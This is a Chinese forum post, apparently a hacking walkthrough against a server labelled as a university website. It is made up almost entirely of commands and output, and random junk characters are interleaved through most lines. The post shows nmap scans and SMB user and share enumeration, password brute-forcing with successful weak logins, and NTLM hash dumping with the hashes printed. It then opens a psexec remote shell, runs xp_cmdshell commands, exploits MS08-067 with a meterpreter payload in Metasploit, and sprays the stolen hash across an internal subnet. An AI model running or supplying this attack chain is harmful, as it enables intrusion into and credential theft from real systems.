广西师范网站http://202.103.242.241/3 y, Y0 q* i. _" J0 u
/ u+ F6 j! C7 }. e! P. Proot@bt:~# nmap -sS -sV 202.103.242.241
+ |# ?# z# _+ v! ^) O) }+ r& j+ V6 n( G
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
: ?: p4 ]( c7 r& n( g- [9 s1 J5 V$ S( Q, f8 y; d6 i0 q3 n- X
Nmap scan report for bogon (202.103.242.241)
' J# U/ B& r9 r) j0 B
+ X* T5 ~$ y$ U/ yHost is up (0.00048s latency).
2 v5 V2 m% o# M) u, v/ Q
5 X% {$ | e5 J6 PNot shown: 993 closed ports
, b: t4 q3 M4 v/ ~% [3 ]9 C
. t: G: O( Y) gPORT STATE SERVICE VERSION' \3 j: A6 w9 { @- F* [' w( P9 C
3 S- L' `& B/ E8 k3 G; X: t& l. R135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)& m0 z+ T' a" F4 ]3 p
$ F+ b+ n8 ?: a7 J) p, D7 x4 S
139/tcp open netbios-ssn
% a8 f" @/ R1 k. x9 v- m0 J5 V
+ r, r4 }* \& ?$ ]445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds( e# n0 {( V2 b1 M
+ C6 A6 R% w( n7 @1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)- X/ T! {8 R# }& d" Q# y' H
9 V5 K( D/ Q% M9 [1 j1026/tcp open msrpc Microsoft Windows RPC
7 U( |( ]! o( L( U# L7 ^
1 Z$ H# j" T/ G7 ]2 R) Q8 T3372/tcp open msdtc?6 m: a6 l( S2 s5 f# `7 r
2 ]7 J! s& @! s9 I$ x- h6 d3389/tcp open ms-term-serv?; {6 k% V1 z! L6 y) s/ K
' y. C9 b( ], k7 {2 y$ V9 w
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : Y, Z7 f, C) |- ?$ J, \
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r% n6 T# Z6 l7 Z1 {8 H
( }8 J2 B' p- T' LSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions! A4 Y& u+ j4 N6 A
; r1 N( V7 x6 K: ~SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”): K0 t& v2 N }
/ h+ L9 r6 Q t. Y% k' U) W1 @/ CSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO" ^4 f( e2 Q: F3 ]& v
: j1 k6 r& g% Z2 i9 M+ c
SF:ptions,6,”hO\n\x000Z”);5 B0 \0 l1 a' Z% N3 G' A
" \& E7 Z* {7 Q4 U7 K: d$ w) D8 zMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
' T# k2 [! S9 h+ X4 l3 K
7 [7 q" L' W, b/ n7 E( e( jService Info: OS: Windows
6 L# ]: S) M/ G1 d) S' c9 n
{. J0 N8 [ S7 p7 gService detection performed. Please report any incorrect results at http://nmap.org/submit/ .
3 }2 b$ ~2 R k9 ]7 r8 d4 ]
4 X& W/ x& A! UNmap done: 1 IP address (1 host up) scanned in 79.12 seconds6 a2 S. m$ o! ~& J4 d
; e& D0 X$ @ C: y, }3 Wroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
5 i5 x7 d2 t' X& B2 ]# y" {" F; J5 O/ U9 j; ]3 X" {( Z
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
! K, b, X. n3 i- q0 p: j: W
1 x, F& o% y5 e! S/ F$ j-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse* x( b2 k* k6 k& t
9 R. { v5 h+ [+ W2 U2 H-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
. u2 U2 ~3 ?! s! j# H# J1 Y# j" }0 K$ w; t3 V5 D3 @& ~/ U5 [( K1 S
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
) h3 F1 `7 @& P3 d9 Z _
# J. ?4 a. B0 W( v2 t-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse8 f9 g' A) ]2 {: ^, L! P) [: N& J8 l
' O4 h! D. V/ M-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse: F" O) C) x1 X, C: P, Y& R
) H9 n/ Y, C1 K$ t2 @
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
9 J/ J( l+ R7 P' z3 Q& V8 {" c+ P2 j% C
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse9 X9 s9 m0 n1 D
2 B- V/ f, C' K
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse2 ^) K. n& u) ?7 @( M9 @4 k2 x5 R+ s
& ~5 d- C, t0 C9 S- i! g# |: I-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse. r' D. `0 [- l1 u
0 T1 |5 N o$ e" Q4 k; f-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse% t" d. _2 Y+ C3 |
1 {5 Z- `& l& M( [% q e0 K-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse ~ t& G( A& K: E$ H
+ l) m$ y' {4 `, P+ W; B5 P9 }
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
1 y- U7 B6 {! F* `: G6 R" y9 c( a
1 c7 Y" ]5 d) g6 @7 K-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
! w" h4 M! c! d" A! a) \; z- Y
9 Y& q7 M/ p! w, e% f6 q-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse. ?# q, q( U+ m* ^% j
+ S5 p2 C! @ g% a
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
. E# u; M2 s: G5 b' _/ }& @' q# j3 Z) G( ~: s9 F
//此乃使用脚本扫描远程机器所存在的账户名
! b3 L1 ?7 L" ?% l2 |
4 P6 N- k2 m1 S" m! HStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST6 w8 ~. u8 U, ~/ h& `+ {% O( Q ?
4 `1 X* W5 T2 W2 a5 A5 l/ Q# x
Nmap scan report for bogon (202.103.242.241)
l% ^3 @# m) r6 o
4 w0 I, p% m8 ~8 ]# }Host is up (0.00038s latency).
9 t$ ~+ Z0 A! P% E. h7 b3 `3 u% |
' ]+ K+ G7 r, WNot shown: 993 closed ports
# _1 \8 o& Y9 B9 v* \
- o Z5 s7 Q2 ]8 @$ JPORT STATE SERVICE/ b& }/ i p# c: R7 w- L
/ ~! ?5 [- b I, ^135/tcp open msrpc5 X+ W; g- [! R d3 K5 p
0 K/ Q) m! [$ x; u4 r139/tcp open netbios-ssn
3 k: U% {% v0 {: p) e$ M/ ^$ N+ J( g8 [. i; P$ _
445/tcp open microsoft-ds3 ]- R8 T+ ?8 Y3 F# ^/ Y
6 z3 c- z. L7 r! K/ `
1025/tcp open NFS-or-IIS
9 y( |5 c `$ _' q( p# n
5 y% M. t8 S/ r3 u5 X6 q( E X7 g1026/tcp open LSA-or-nterm8 j1 R9 n& ~: H3 c4 U( b
4 L: s% M3 E6 z6 j. p3372/tcp open msdtc
$ w, C, S( U4 [; z6 a4 S& r/ k' g8 P' o) C3 {3 Z( D8 Q
3389/tcp open ms-term-serv! L2 N& }2 l( U3 Z" D) l
4 n N/ D3 ?0 b6 |. P/ G$ {, gMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)( j) Y8 S* R, Q7 _) I* K, {
4 r* m" e& c- {3 O
Host script results:; m* n) C! n; T
* ~. F: `: ~' p/ e; h/ b| smb-enum-users:
, W( ]0 H# l3 k+ I5 r
( K1 s% \7 B* N8 e|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果 ^3 I0 v: J9 N8 y! R7 X9 U
% ]! D6 q) S7 m
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
) E6 O$ ~- _$ [2 A9 P7 w4 A
' G5 c7 z( H- Q( S3 D4 xroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 & c) ^* E P% _
p% h% W4 ^5 |2 k
//查看共享3 ?- O% z1 k) W$ J
) O: |/ A9 u( O; b
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST% _ v; u4 f4 G4 k
8 q8 L. Y# N' L! S% P; wNmap scan report for bogon (202.103.242.241)
0 r7 A4 A! G8 r# S7 H, t$ }. |% E7 x# ~' m; ?8 {
Host is up (0.00035s latency). @! ^. ^! T. ?; v, Z/ [
$ W, z/ O- t, ^# i7 jNot shown: 993 closed ports. K! V' x4 w; v0 n3 b
# _: k$ ?- c8 x2 W4 v7 L* HPORT STATE SERVICE! i* A6 p4 |1 p0 P. t) m
4 R- o* M5 W; d/ h- j4 ?135/tcp open msrpc
' [+ v2 U6 E( ]4 j- u
9 P+ t" V2 y% J5 z139/tcp open netbios-ssn
4 O/ q6 |, a) p( \5 K9 K" \& v, @; c5 K# j" V q" E
445/tcp open microsoft-ds
9 h) h; u: E [" X' [6 O6 p, E, O& c5 }9 j3 S% n& f. I) ?+ z
1025/tcp open NFS-or-IIS/ b! U, E$ |: J6 z$ Z
C, Q3 l4 y' u# S$ v- o; P1026/tcp open LSA-or-nterm; j' a* G$ |+ r
8 h- u& w* l2 ~& p3 Q1 ?5 Q; e; }; G
3372/tcp open msdtc- s9 S5 I9 P) {, B# T
: c7 }& b# ~+ S. ?/ m+ a6 Z d3389/tcp open ms-term-serv& B4 Q' m: `$ }9 j8 t
1 K# V) s! T A }( l1 uMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)9 I, G8 B3 T3 ?4 z: q
# M0 M1 |9 ]" V. E3 H
Host script results:. c2 b6 D1 _$ G- Z: n" J
, d, `" K1 x$ `2 R, d3 j" F% F8 M. H| smb-enum-shares:& a- Q$ E( w0 J% s( F
' |$ }5 M v, Q5 P| ADMIN$# }- m& P3 A, l) g, }. H6 q% _
$ x: z% w4 P1 f& b# D
| Anonymous access: <none>
6 ^) [- N0 l! n* D$ M( y
$ H! V$ @9 X( }( F! V. Y| C$3 ]6 k: \" B8 u% ]6 f2 z
/ [5 z5 p3 A/ y8 Y| Anonymous access: <none>( `7 @% N; [ O# `8 _1 G( W/ z
6 f) S9 _4 w8 o) V6 G0 D/ {| IPC$
4 j( Z/ d# J1 n4 ~) [# ~+ c7 d! a. K: x; e. _. a( o8 b$ ?, o R
|_ Anonymous access: READ9 J: L% d, h( Y n$ [* [& T7 v
/ i3 y. z& o# o' F( D
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
5 I$ w5 X1 P( V( h* _" @) A0 Y/ X/ M# _
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 7 d2 c% u5 J/ s5 H5 ]
3 b, K4 Y* Q, [* n. D, B//获取用户密码
& k/ y" k4 X! [8 |% z: w" Q; p D& Z+ _/ h6 ~- v9 r
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
/ z5 c8 S* {) n! H; _9 J0 D" w
( T" r; P+ c1 ?$ g7 v( U2 d& r( VNmap scan report for bogon (202.103.242.2418)
, Z) Q- [% o; ?; _% O7 o N
% |( w9 |5 }, v1 V( U p; \Host is up (0.00041s latency).
3 E5 V+ k; m7 c9 L
& g. a/ |2 @( i3 a$ K a2 zNot shown: 993 closed ports
2 c( h X, N2 Z" N! m' C2 S% j" e; R* h4 q
PORT STATE SERVICE- ~" e* `, ~1 h$ v% v0 \0 P% x- u
- `$ d% {2 Y9 U2 Z; \) I
135/tcp open msrpc$ {1 C. A- t* `# }% i( }2 ~ P
; N0 c$ m9 W- U6 @ M
139/tcp open netbios-ssn8 i+ d- d" D; k |; \
. I5 u/ R* c: f+ H5 l5 K
445/tcp open microsoft-ds
Y7 C" W5 N7 B1 w, |0 h Z% z1 @1 s
9 l/ C' M: s. G6 m0 k& {8 l( h1025/tcp open NFS-or-IIS
' m0 U) ?' i; I4 P( N, l9 e; z. _4 ^" G
1026/tcp open LSA-or-nterm
+ ?1 u8 i# o% d. y) Y. V% R" V0 K9 K
3372/tcp open msdtc
5 e. Q. Y* t* ? y, ?. q7 a( t* E @ [1 Z& [( l
3389/tcp open ms-term-serv
^ m, P9 o1 t$ o( S ~( @! f0 M/ x7 ?
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
3 A& G; H: y. Y7 M4 c& A6 |" P
' v: W/ G: X% L0 _3 ]$ [Host script results:3 D. F: ^/ B, O0 T; \
' p7 T" c6 u" R) K| smb-brute:" e% t$ a( w4 O5 o8 H8 |1 f# O
2 e. Y/ `9 B- l
administrator:<blank> => Login was successful
$ Q2 y' N6 r/ H; N
' o( x" }7 h2 t+ o" f|_ test:123456 => Login was successful
& x" v1 f4 ?4 w4 } L1 m$ q' k! L
/ W5 A" X0 R, B' b' KNmap done: 1 IP address (1 host up) scanned in 28.22 seconds# v+ c: q1 B/ j
6 S2 }7 r3 w* o3 I& z, F* \6 e
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
8 i* @% I) ^9 f5 K+ M; @5 o. _6 O* I/ i+ W# p3 k F
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data7 ]2 Y, |, ~% R4 p
; z+ k; ^6 I% H, W0 r7 Proot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
; |$ ?3 g/ \; U' D0 x* D+ c6 |- ]5 X1 ^4 Y2 u7 W1 N7 E
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139$ h7 ^- |+ Q- v- y
! O8 `, K ^, j* y- z% m! Q0 oStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
9 |0 I" s$ F, f1 z) s# U8 i1 r& d& S# r! c, @* k2 ~
Nmap scan report for bogon (202.103.242.241)4 F; w) H* A3 K1 O- q/ p
+ R# p0 F: \% L8 U: AHost is up (0.0012s latency).
1 p+ |$ W4 U0 e @( a6 a c! u! U6 N
PORT STATE SERVICE" b" }, ^7 R3 A# w
$ | ~2 Z4 K3 A4 S9 I( c
135/tcp open msrpc
$ X" A9 a! Y# A& A1 S: x
8 v7 W; j+ X0 |' p139/tcp open netbios-ssn% E1 _3 E' p: q( [: p# [4 F
. d7 g3 [' P: X1 z; Y2 m; G8 f445/tcp open microsoft-ds
2 ]- f- D* B# a" G# \0 Q
9 P7 k7 T; h) F! i# I( R* wMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
8 \7 @8 }) D) a/ `6 z7 o" Q$ d, |( K+ ^
Host script results:
, S. ?$ k' U2 z9 t7 I4 ^
$ z8 z$ m" X5 | K+ k| smb-pwdump:' w( x. }3 J# `7 \4 I4 r0 W. t
! l* |5 P$ V1 f l3 d" [9 c: `6 z% r
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
# C$ T1 n0 e6 U9 m, K# }0 k2 ^! j* I8 B$ h1 T9 x( S- ^
| Guest:501 => NO PASSWORD*********************:NO PASSWORD********************** ^; s' `4 {5 ?9 i( M+ W
" H k; n" k' h0 c| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4( j$ ]" t; U2 ]! @4 R3 Q8 B) h
5 P( C/ T% i, r/ d- I5 C3 o|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
4 c, x7 O. m4 j* x
* f9 D) p9 {7 e7 d7 X. M4 K; GNmap done: 1 IP address (1 host up) scanned in 1.85 seconds0 _- C3 H6 i) T# g+ q
2 Z: w, g8 }# `, {& [+ \4 j) d
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell' H! a% R4 Z9 ]
* P' g5 z2 V- ?
-p 123456 -e cmd.exe& M! S5 N+ s5 v. v, N& i, }
# z& Z W8 ^2 c4 `. J
PsExec v1.55 – Execute processes remotely& B2 O7 t9 ?9 C5 W+ h; ]5 {
, V7 |; d1 V3 mCopyright (C) 2001-2004 Mark Russinovich4 X1 u8 v: J6 [
& p8 @) ~9 }; ?! p: mSysinternals – www.sysinternals.com% i/ d4 S. D2 j* q; G& q. v
6 \, ~* ]2 s; o! w( vMicrosoft Windows 2000 [Version 5.00.2195]
9 I+ T0 j8 y0 y. E5 `0 V( M9 N6 G) F; _1 u
(C) 版权所有 1985-2000 Microsoft Corp.& o7 b6 |! V; _7 _- p0 y2 a' l/ n
' [( |/ D- Y$ J e/ q4 @5 @
C:\WINNT\system32>ipconfig, C* l3 \) i# Y
! G% y0 C5 @, h# t( k9 {Windows 2000 IP Configuration* D7 l* a: o7 }0 \2 L
# y8 z$ M* P- I9 g: i! T
Ethernet adapter 本地连接:
+ E) P/ d n9 H: I
2 Q, D" j4 _8 C3 ~9 t% M0 EConnection-specific DNS Suffix . :& x' Z, b6 m; B: d
5 M! O+ e* p9 ^ q& v/ Q; }
IP Address. . . . . . . . . . . . : 202.103.242.241
* t2 b# M- s3 o; l& i7 }( z5 T' P7 x; ^
Subnet Mask . . . . . . . . . . . : 255.255.255.08 p" |' }& U: s* V9 f4 C( R
% s; [; ]" W4 j2 u' i* n/ YDefault Gateway . . . . . . . . . : 202.103.1.1
; _1 e! Y6 n0 a% E: ]6 C* S# E
4 Y" u: n. I3 A- g Y, |5 [% G. aC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令: Z7 V2 A! N- z/ A' v- G
. j* |& u$ m+ @5 y; q* }3 Z' B3 Qroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞* K0 R, O- L7 Q( S
8 d# Y5 c: U7 B% S0 S/ h
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
/ @ S7 f: V! v ~, v
, O# f, R7 h5 r9 _3 yNmap scan report for bogon (202.103.242.241)
+ W% @' Y# }, A+ H1 H Z& B
9 ~% P9 i4 n1 G% t) G! YHost is up (0.00046s latency).2 }$ c% R8 O& q2 }8 e* z1 Y- x, g
9 Y! w) i2 V4 o6 O
Not shown: 993 closed ports; ~ r$ U) L/ B' V2 z" Z
$ y: h, t9 Y, M' g) ~3 xPORT STATE SERVICE/ p9 ]7 K. k1 D; F% i+ Z
, Y7 c# \) b- t$ b: U% S& B$ t135/tcp open msrpc! D5 @+ P. ~/ z1 l
P" i; P9 v% q* ?. E- w139/tcp open netbios-ssn
/ t- k6 w" V, r5 C/ G3 w
, p3 ?5 V2 f+ t/ e U- p5 N( _445/tcp open microsoft-ds
. s6 k* a+ m. K! |# `$ C7 V8 a" Q; P% @: ~" {$ ]& [
1025/tcp open NFS-or-IIS) p) Z: p. e9 H3 `; R
0 ~# h! }) L3 K' _. Q# v1026/tcp open LSA-or-nterm
+ r/ r# o3 X" ~8 G
7 \! V; \& d4 ?" x& s* T9 ~3372/tcp open msdtc
0 K: N6 i! ~2 g2 }7 D2 Z8 y0 V
3 ]( [/ P8 c0 Y1 I4 s3389/tcp open ms-term-serv5 Q- B7 S4 }- @) ~ E/ A
5 W9 G, B& p% g, ]) hMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)' a7 E+ h2 P' E: H! B) r
; t6 s% s* x4 R' W
Host script results:
5 `% l. {- b+ S, j( s5 k
. m; F. U# l0 N2 w/ l| smb-check-vulns:$ p! F& ?+ W2 h' T4 ~- t
% F, o! Y" X+ D7 |4 Q|_ MS08-067: VULNERABLE
4 G2 \9 e6 [- {/ g
& v) p4 }3 W/ U% `3 ~Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds$ z5 d2 G1 T, X8 a: T, C1 P
! s8 F3 W# I* T7 y* p/ U, x8 Z. W
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
: H5 z- F4 ]4 n: p9 N+ ^3 x" ~' D+ L* [# q
msf > search ms08
8 U4 @5 f) X" ]- a! M \" t: S g" r8 I/ T& O6 y
msf > use exploit/windows/smb/ms08_067_netapi
3 ~. C) T9 b; r3 M* {" `$ y3 F/ B: e& N( i3 j
msf exploit(ms08_067_netapi) > show options
7 K6 T9 d K# d
7 H0 l$ p h2 G- x+ R8 Imsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241! R9 w! D0 Y+ X3 r% H' P8 ]
+ M* A& _3 R$ [! r/ F/ \( M
msf exploit(ms08_067_netapi) > show payloads
* S5 J4 P- \' F2 s) n' c/ S
1 ~6 ]/ R3 D/ rmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp6 S% R5 [7 a/ c* r$ Q
, g8 z) G& `( ^3 o
msf exploit(ms08_067_netapi) > exploit
' B( A3 e% ~8 L4 Z: x0 B" h( }# P" Y. l" g g: h% x2 R
meterpreter >7 e' i4 N8 U+ q6 ?' `6 E) C5 h
6 e4 l% s( d- [: LBackground session 2? [y/N] (ctrl+z) `; }5 ^# `3 T) Y1 L+ C. c6 z
' e3 h2 K5 b: c' a: [msf exploit(ms08_067_netapi) > sessions -l
, K! E& p7 B0 |' Z4 `4 \; P& [+ O2 M: z2 W
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
- R, z' u& T, {' m9 a
' U8 F' z) Q2 h2 Ctest$ o. q6 R; P% [
7 I* j0 ]# M$ Z' t
administrator
9 g ]# \* Q1 Y/ d& ?" w; C8 H
0 ?+ u) ^/ W1 S0 I" q4 ]root@bt:/usr/local/share/nmap/scripts# vim password.txt
- U4 p: m! B" O. T8 ]$ Y, Q# G
* f* G; f; j8 z* [4 x, x44EFCE164AB921CAAAD3B435B51404EE: T' Z3 o3 N! R ~) I* ]! F
. ?$ f8 C* S @& q( ]! `
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 - t' Y; j7 e, `" \
8 x+ G: r4 ~8 x% a5 y* m% }
//利用用户名跟获取的hash尝试对整段内网进行登录
. x3 K, g) X8 B. p
+ v7 c+ Z, n" d+ W: I& b1 E$ PNmap scan report for 192.168.1.105, y) j+ R( g1 N g: N4 `
3 o9 A2 {) {# UHost is up (0.00088s latency).9 b* V1 f( i: B6 M* S$ k
+ {, y" F) @ I& ]0 E2 }
Not shown: 993 closed ports3 W" U5 @) X1 D) P o
7 ^2 r- n$ Q% I9 l/ J; I
PORT STATE SERVICE- p m V6 ~; Y+ q$ R3 h
2 Y% c, n( N& a, l8 I135/tcp open msrpc
% |- F) A7 j1 m9 q- } T3 G+ S: Z& Z1 Q3 W& E; z7 P* B
139/tcp open netbios-ssn# G/ W( C" k, V2 e6 T2 y- V9 y$ W
* B) {$ Q! Y2 [" Y' _
445/tcp open microsoft-ds
, O, R' j' v4 ^: a: z' W. ^, m1 Z2 {
1025/tcp open NFS-or-IIS
' A$ t8 d' j' x; \# p& J- z6 o- m j
" b, _ v% i3 _* T, I1026/tcp open LSA-or-nterm. q L: E/ T- s7 g# `
( x" t6 H; [6 E; @
3372/tcp open msdtc
7 b/ O+ K+ ^ c2 k k) R1 D9 ~' Z; p. m! v# i ^
3389/tcp open ms-term-serv
. F0 O% K' S* C$ W1 W& ]3 q! p. t$ W+ k4 I9 @2 n, u: B" p
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)7 c8 D5 i l4 D1 d$ P
: z& ~# U3 G0 n( n$ E
Host script results:
0 S& t6 `9 X+ j$ M: X% K2 F* _* M* l+ V0 y8 P' J% u
| smb-brute:
( J* P$ k m2 z, b; c. L/ z" {4 U/ a f
|_ administrator:<blank> => Login was successful
" L. K: b% k. L! N' T: F- x, X/ d* P, l; r& Q) x
攻击成功,一个简单的msf+nmap攻击~~·* `7 k+ k3 m( ?+ ~
4 v1 P4 O3 [( V; p4 O; n) x
|
发表于 2012-12-4 12:46:42
收藏
支持
反对